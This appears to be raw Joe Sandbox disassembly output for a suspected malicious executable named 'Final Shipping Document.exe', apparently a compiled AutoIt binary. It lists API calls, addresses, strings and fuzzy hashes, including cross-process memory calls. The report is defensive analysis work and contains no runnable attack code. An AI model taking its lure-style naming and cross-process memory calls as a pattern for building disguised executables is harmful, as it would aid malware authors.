                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6), ref: 00BD2DFD
                                                            • _free.LIBCMT ref: 00BD2E32
                                                            • _free.LIBCMT ref: 00BD2E59
                                                            • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E66
                                                            • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E6F
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?,?,00C0035E), ref: 00C0002B
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00046
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?), ref: 00C00064
                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00070
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E997
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0E9A5
                                                            • Sleep.KERNEL32(00000000), ref: 00C0E9AD
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E9B7
                                                            • Sleep.KERNEL32 ref: 00C0E9F3
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                            • Instruction ID: 9bb10c7243aa512d7de0f6b5393400eb2cb7044eabc53ec91412224ff92d7d7b
                                                            • Opcode Fuzzy Hash: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                            • Instruction Fuzzy Hash: 3AF06D35210301EBDB215FA4EC89F5E3BADEF89761F140414FE85E7290CA70D950CB60
                                                            APIs
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10324
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10331
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C1033E
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C1034B
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10358
                                                            • CloseHandle.KERNEL32(?,?,?,?,00C1017D,?,00C132FC,?,00000001,00BE2592,?), ref: 00C10365
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                            • Instruction ID: f2a79699114a262bed80875c0be496ad8c38537cbfa9bedad09905795aea1d84
                                                            • Opcode Fuzzy Hash: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                            • Instruction Fuzzy Hash: 5501A272800B15DFC730AF66D880456F7F5BF513153658A3FD1A652931C3B1AA95EF80
                                                            APIs
                                                            • _free.LIBCMT ref: 00BDD752
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDD764
                                                            • _free.LIBCMT ref: 00BDD776
                                                            • _free.LIBCMT ref: 00BDD788
                                                            • _free.LIBCMT ref: 00BDD79A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: a0d34ea2e86ea89843da5053ae422d34617b8700f02ccff5b19f81670924c28e
                                                            • Instruction ID: dd583b9f85c91b76bf32cb8d2907a0944346ba99ca78630409c3dca1873b800e
                                                            • Opcode Fuzzy Hash: a0d34ea2e86ea89843da5053ae422d34617b8700f02ccff5b19f81670924c28e
                                                            • Instruction Fuzzy Hash: 77F04F32544244ABC635EB65F9C1E2ABBDDFB44310B940897F098D7741EB24FC808A64
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C05C58
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C05C6F
                                                            • MessageBeep.USER32(00000000), ref: 00C05C87
                                                            • KillTimer.USER32(?,0000040A), ref: 00C05CA3
                                                            • EndDialog.USER32(?,00000001), ref: 00C05CBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 2869a91a641330aad52fc6cd90150d2c726c83b297cd95b00717aabb0fce7c67
                                                            • Instruction ID: 32c5211d4c7826c2488462d97a487c0c0ae1247fec4ff818820c4292fc45d07e
                                                            • Opcode Fuzzy Hash: 2869a91a641330aad52fc6cd90150d2c726c83b297cd95b00717aabb0fce7c67
                                                            • Instruction Fuzzy Hash: 1C016D31510B04ABFB215B10DE8FFAA7BB8BB04B05F041559B693B10E1DBF4AA84CF90
                                                            APIs
                                                            • _free.LIBCMT ref: 00BD22BE
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BD22D0
                                                            • _free.LIBCMT ref: 00BD22E3
                                                            • _free.LIBCMT ref: 00BD22F4
                                                            • _free.LIBCMT ref: 00BD2305
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4a77340186be8b78ea52316415de3037dd6b02af3268e82473ab879663af4901
                                                            • Instruction ID: 0e4b081c8ef25af41eef942c1a70146cf6975911b0f2204ca6aa2e6cb58a3a3d
                                                            • Opcode Fuzzy Hash: 4a77340186be8b78ea52316415de3037dd6b02af3268e82473ab879663af4901
                                                            • Instruction Fuzzy Hash: 57F030784001908B8722AFA8BC51B1C7BA8F72C7507140597F418D73B2DB740491BBA4
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 00BB95D4
                                                            • StrokeAndFillPath.GDI32(?,?,00BF71F7,00000000,?,?,?), ref: 00BB95F0
                                                            • SelectObject.GDI32(?,00000000), ref: 00BB9603
                                                            • DeleteObject.GDI32 ref: 00BB9616
                                                            • StrokePath.GDI32(?), ref: 00BB9631
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                            • Instruction ID: 89480a73a4c13bc06dd36ec5117fd12057a963acf62198fe68937e1a705efd8a
                                                            • Opcode Fuzzy Hash: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                            • Instruction Fuzzy Hash: E8F0EC31015744EBDB265F69ED5C7BC3FA5EB11322F088254FA6A650F0C7748996DF20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __freea$_free
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 3432400110-3206640213
                                                            • Opcode ID: 4cbae685f702dcd777bf8fe74cbf77723c8dcff42a735b6774f67fe39996197f
                                                            • Instruction ID: 8063c240f2e7b9307d505d88005285abffa36cd08963edfe08d026a61576d4e0
                                                            • Opcode Fuzzy Hash: 4cbae685f702dcd777bf8fe74cbf77723c8dcff42a735b6774f67fe39996197f
                                                            • Instruction Fuzzy Hash: 23D1E131900206BADB289F6CC895BBAF7F1EF05710F24499BE505AB751F3359D80CB65
                                                            APIs
                                                              • Part of subcall function 00BC0242: EnterCriticalSection.KERNEL32(00C7070C,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
                                                              • Part of subcall function 00BC0242: LeaveCriticalSection.KERNEL32(00C7070C,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                            • __Init_thread_footer.LIBCMT ref: 00C27BFB
                                                              • Part of subcall function 00BC01F8: EnterCriticalSection.KERNEL32(00C7070C,?,?,00BB8747,00C72514), ref: 00BC0202
                                                              • Part of subcall function 00BC01F8: LeaveCriticalSection.KERNEL32(00C7070C,?,00BB8747,00C72514), ref: 00BC0235
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                            • API String ID: 535116098-3733170431
                                                            • Opcode ID: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                            • Instruction ID: 6eaae023dc6b296db55037e3ea1a54a0f9e60bc263cd9c478618dd433ee2d552
                                                            • Opcode Fuzzy Hash: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                            • Instruction Fuzzy Hash: CB918A70A04219EFCB14EF94E8D19BDB7B1FF49300F108199F816AB6A2DB71AE41DB51
                                                            APIs
                                                              • Part of subcall function 00C0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021D0,?,?,00000034,00000800,?,00000034), ref: 00C0B42D
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C02760
                                                              • Part of subcall function 00C0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C0B3F8
                                                              • Part of subcall function 00C0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C0B355
                                                              • Part of subcall function 00C0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B365
                                                              • Part of subcall function 00C0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B37B
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C027CD
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0281A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                            • Instruction ID: e2a8df74d1264c4c9f20b45999cbe21c5d23a7c7b93a581ef63facd8a462fb00
                                                            • Opcode Fuzzy Hash: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                            • Instruction Fuzzy Hash: 34411B76900218AFDB10DFA4CD86BEEBBB8AF09700F108095FA55B7191DB706F45DBA1
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Final Shipping Document.exe,00000104), ref: 00BD1769
                                                            • _free.LIBCMT ref: 00BD1834
                                                            • _free.LIBCMT ref: 00BD183E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\Final Shipping Document.exe
                                                            • API String ID: 2506810119-2946767437
                                                            • Opcode ID: 8ad7a1ca8e9ee5b7e70e3ed3caf2b9168da0b5b0376b72a3abbf79e3839df700
                                                            • Instruction ID: 00b63d2289d0ec3b913b9b03172150365ea773c9383adc7f4e35c402db33addb
                                                            • Opcode Fuzzy Hash: 8ad7a1ca8e9ee5b7e70e3ed3caf2b9168da0b5b0376b72a3abbf79e3839df700
                                                            • Instruction Fuzzy Hash: A1319CB5A00248BBDB21DB9D9885E9EFBFCEB85310B1445E7F80497321E6708E80DB90
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C0C306
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C0C34C
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C71990,015E64B8), ref: 00C0C395
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                            • Instruction ID: fdfa5f3334d085cd5b069189f1f650456f77e8ad39ca2ae8047e27b74cfaa86b
                                                            • Opcode Fuzzy Hash: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                            • Instruction Fuzzy Hash: F1417C312143019FDB20DF25D8C4B9EBBE4AB85320F148B5EF9A5972E1D730EA04DB62
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C3CC08,00000000,?,?,?,?), ref: 00C344AA
                                                            • GetWindowLongW.USER32 ref: 00C344C7
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C344D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            APIs
                                                              • Part of subcall function 00C2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C23077,?,?), ref: 00C23378
                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                            • _wcslen.LIBCMT ref: 00C2309B
                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C23106
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 946324512-2422070025
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C34705
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C34713
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C3471A
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 176396367-2734436370
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C33840
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C33850
                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C33876
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C14A08
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C14A5C
                                                            • SetErrorMode.KERNEL32(00000000,?,?,00C3CC08), ref: 00C14AD0
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C3424F
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C34264
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C34271
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            APIs
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                              • Part of subcall function 00C02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                              • Part of subcall function 00C02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                              • Part of subcall function 00C02DA7: GetCurrentThreadId.KERNEL32 ref: 00C02DDD
                                                              • Part of subcall function 00C02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C02DE4
                                                            • GetFocus.USER32 ref: 00C02F78
                                                              • Part of subcall function 00C02DEE: GetParent.USER32(00000000), ref: 00C02DF9
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C02FC3
                                                            • EnumChildWindows.USER32(?,00C0303B), ref: 00C02FEB
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 1272988791-1110647743
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C358C1
                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C358EE
                                                            • DrawMenuBar.USER32(?), ref: 00C358FD
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw
                                                            • String ID: 0
                                                            • API String ID: 3227129158-4108050209
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFD3BF
